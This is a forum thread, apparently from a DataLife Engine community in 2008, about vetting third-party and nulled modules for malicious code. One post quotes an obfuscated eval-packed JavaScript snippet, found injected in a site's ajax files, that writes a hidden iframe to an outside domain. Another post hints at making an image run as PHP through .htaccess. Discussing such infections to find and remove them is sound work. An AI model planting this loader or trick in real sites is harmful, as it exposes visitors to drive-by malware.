daykkin 0 Опубликовано: 11 января 2008 Рассказать Опубликовано: 11 января 2008 я это понял спустя пол часа) и занялся модулями) Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 11 января 2008 Рассказать Опубликовано: 11 января 2008 Автор Проверять null - это бредотчасти согласен. Времени на проверку ворованной версии вы потратите примерно столько же, за сколько могли бы заработать необходимую сумму на покупку лицензии Цитата Ссылка на сообщение Поделиться на других сайтах
Rokki 0 Опубликовано: 13 января 2008 Рассказать Опубликовано: 13 января 2008 Что делать если исхдный код закрыт Зендом? - да собственно ничего, ставить мод (плагин) на собственный страх и риск. Как что в сети полно дезендов и все легко дезендится Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 13 января 2008 Рассказать Опубликовано: 13 января 2008 Автор Rokki, статья направлена в первую очередь для неискушённых пользователей Цитата Ссылка на сообщение Поделиться на других сайтах
Fillosoff 1 Опубликовано: 13 января 2008 Рассказать Опубликовано: 13 января 2008 lifestar, и вообще, все ребята. спасибо! оч необходимая тема. у меня самого установлено только несколько хаков и 1 модуль. но собираюсь еще как минимум парочку поставить. и вообще-то внимательно проверяю. что ставлю. но так как более-менее силен только в html и css , то вычищал из них только все ссылки, e-malеs. хых, есть один чел, пишущий модули и хаки (не буду называть) так у него на 100% кода 75% рекламы. безобидно, но все же..)) буду использовать ваше руководство и по-тихоньку расширять свою "карту мира")) Цитата Ссылка на сообщение Поделиться на других сайтах
kosen 3 Опубликовано: 13 января 2008 Рассказать Опубликовано: 13 января 2008 Kot Da Vinci - Fillosoff, Имя брат... имя... Цитата Ссылка на сообщение Поделиться на других сайтах
IT-Security 33 Опубликовано: 13 января 2008 Рассказать Опубликовано: 13 января 2008 Это точно не я Я код аккуратно пишу и без рекламы =) Только комментарии в самом начале скрипта если вдруг хозяин сайта со мной контакт потеряет =) Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 13 января 2008 Рассказать Опубликовано: 13 января 2008 Автор Kot Da Vinci - Fillosoff, ты про Хаммера? Если да, то у него это считается не рекламой, а копирайтами Цитата Ссылка на сообщение Поделиться на других сайтах
Fillosoff 1 Опубликовано: 13 января 2008 Рассказать Опубликовано: 13 января 2008 lifestar, не пойду с тобой в разведку!! и мой совет тебе, не зови Хамера Хаммером, он обижается очень Цитата Ссылка на сообщение Поделиться на других сайтах
WMDrakon 20 Опубликовано: 13 января 2008 Рассказать Опубликовано: 13 января 2008 Kot Da Vinci - Fillosoff, пораднились? Я к сожалению, не помню история с Хамером, но кажись там было что то не чисто P.S. Все, хватит флудить не по теме. Цитата Ссылка на сообщение Поделиться на других сайтах
BlackM 0 Опубликовано: 13 января 2008 Рассказать Опубликовано: 13 января 2008 lifestar как прошли твои эксперименты с картинками?) Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 13 января 2008 Рассказать Опубликовано: 13 января 2008 Автор BlackMaster, если честно - не проводил. Стало вдруг резко некогда, проведу через неделю-две Цитата Ссылка на сообщение Поделиться на других сайтах
BlackM 0 Опубликовано: 14 января 2008 Рассказать Опубликовано: 14 января 2008 ) главное в .htaccess не забудь поставить что картинка обрабатывалась как php) Цитата Ссылка на сообщение Поделиться на других сайтах
dedugan 0 Опубликовано: 9 февраля 2008 Рассказать Опубликовано: 9 февраля 2008 Да, это очень поучительная тема. Я конечно тоже стараюсь проверять, но... У меня непонятный чужой код как-то просочился в четыре файла папки /ajax при чем в "родные" файлы, типа dle_ajax.js с java скриптами. Причиной проверки стало недавнее появление "чужой" ссылки в начале загрузки сайта. Найти-то я нашел, но вот как они туда попали, неизвестно пока... Из сторонних модулей стоит только Arcade (мод игр), да блока OnLine. Но я эти модуль и блок использую достаточно давно и раньше ничего не было.. Java scrits в общем-то довольно стремная вещь сама по себе... Пока мыслей нет, ищу. Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 9 февраля 2008 Рассказать Опубликовано: 9 февраля 2008 Автор непонятный чужой код как-то просочился в четыре файлаинтересно посмотреть на код ava scrits в общем-то довольно стремная вещь сама по себеа мне язык ява скрипт очень даже нравится =) Цитата Ссылка на сообщение Поделиться на других сайтах
dedugan 0 Опубликовано: 10 февраля 2008 Рассказать Опубликовано: 10 февраля 2008 интересно посмотреть на код а мне язык ява скрипт очень даже нравится =) Мне тоже нравится ява, но она довольно опасная штучка Кусочек "чужого" кода такой (это только в файлах .js, но есть еще и в .php): eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('d.f("<1 6=\'7://5.4/2.3?8\' 9=\'0\' e=\'0\' c=\'a:b\'></1>");',16,16,'|iframe|in|cgi|cn|orentraff|src|http||width|display|none|style|document|heig ht|write'.split('|'),0,{})) в итоге в начале загрузки страницы идет ссылка orentraff.cn.... Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.